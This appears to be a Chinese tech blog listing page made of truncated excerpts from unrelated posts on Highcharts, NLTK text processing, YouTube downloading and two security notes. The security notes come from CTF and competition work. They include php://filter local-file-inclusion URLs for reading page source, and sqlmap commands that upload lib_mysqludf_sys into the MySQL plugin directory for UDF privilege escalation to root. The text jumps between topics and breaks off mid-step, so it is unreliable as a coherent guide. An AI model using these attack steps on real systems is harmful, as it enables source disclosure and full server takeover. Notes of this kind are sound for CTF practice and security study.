Highcharts作为最牛逼的前端图形库当之不愧,不仅使用简单并且非盈利项目可以免费使用,复制粘贴几下就可以生成绚丽的图表,方便各位给Leader或者外行人员装逼专用。虽然说目前百度的Echarts也非常火爆,荣获github上国内加星最多的项目,但是个人始终觉得还是Highcharts更胜一筹,不过在大数据特征展示上面我还是推荐Echarts。
个人接触Highcharts已经有好几年了,但是从来都没怎么深入研究过,不过话又说回来,Highcharts这种傻瓜式的前端库也没有高深的使用技巧,但是对于不熟悉的新手可以从如下的总结中进步提升。
Codegate CTF中owlur的一点解题技巧,通过测试发现网站有文件包含可以通过php://filter读取页面源文件,对php://filter不熟悉的可以研究下:
http://x/owlur/index.php?page=php://filter/convert.base64-encode/resource=upload
http://x/owlur/index.php?page=php://filter/string.rot13/resource=ndex
其中读取后的内容是经过编码了的,要看源码记得解码,比如rot13可以在Linux下:
前面虽然对「nltk分句和分词」进行了分析和实现,但是在进一步进行处理之前,我们需要对这些词语进行规范化处理,例如我们需要统一所有单词的大小写,词语时态问题「相同的单词在不同的时态句型中属于不同的单词,我们需要转换为同一单词」等。nltk则针对问题提供了相关的类库,主要有两类操作:词干提取,词性标注。
词干提取主要是将不同时态的词语转变为单词一般时态,例如seeing->see,extremely->extem,目前提供的类库在一定程度上可以实现这类转换「有些词语暂时不行,主要有些模块是基于字典的」。
前几天做一个小竞赛中有一个题目:给定的测试环境登录页面有POST注入漏洞,于是果断操起sqlmap跑数据,无意中发现当前MySQL连接用户为root,于是想到udf提权「虽然Windows下MySQL提权基本上没问题,但是Linux环境下原来一直没成功过。」,最终成功获取root权限「主要问题在于MySQL是以root权限运行」,记录笔记如下,方便以后查阅:
找到MySQL插件目录:
python sqlmap.py -u 'http://xxxx' --sql-shell
show variables like "%plugin%";
利用sqlmap上传 lib_mysqludf_sys到MySQL插件目录;
python sqlmap.py -u 'http://xxxx' --file-write=/lib_mysqludf_sys.so
--file-dest=/usr/lib/mysql/plugin/
NLTK在数据抓取完成后,你拿到的数据往往是一篇文章或者一大段文字,在进行其他处理之前,你需要先对文章进行切割或者处理(去除多余字符、特殊符号,分句和分词),分句主要是可以把有些不需要的句子给去掉,比如长度小于10的。
分句在nltk中没有提供相关的库来实现,但是我们可以通过python的split等函数快速完成切分任务,主要的分割特征如下: + 中文主要有(。?!)这几个句子结尾标志; + 英文也差不多(. ? !); 使用split函数进行分割,可以得到新的列表,例如下面的函数;
最近一直有人问我YouTube的视频怎么下载,其实在V2EX上也有很多用户讨论这个问题。本文就将这些方法汇总,方便大家查询和参考。
在介绍下载方法之前,首先大家需要明白的是本文针对的是YouTube上的视频,也就是说原始地址都必须是YouTube的视频链接。如果你需要下载的视频在其它网站上,那么你需要判断是否为YouTube视频并且需要找到YouTube的原始链接,其实链接也非常好找,点击播放器右下角的「YouTube」就可以打开YouTube的原始链接,有了这个原始链接就可以采用如下两种方法下载:
「推荐」这种方法简单快捷,懒人必备,整个过程只需要点击几次: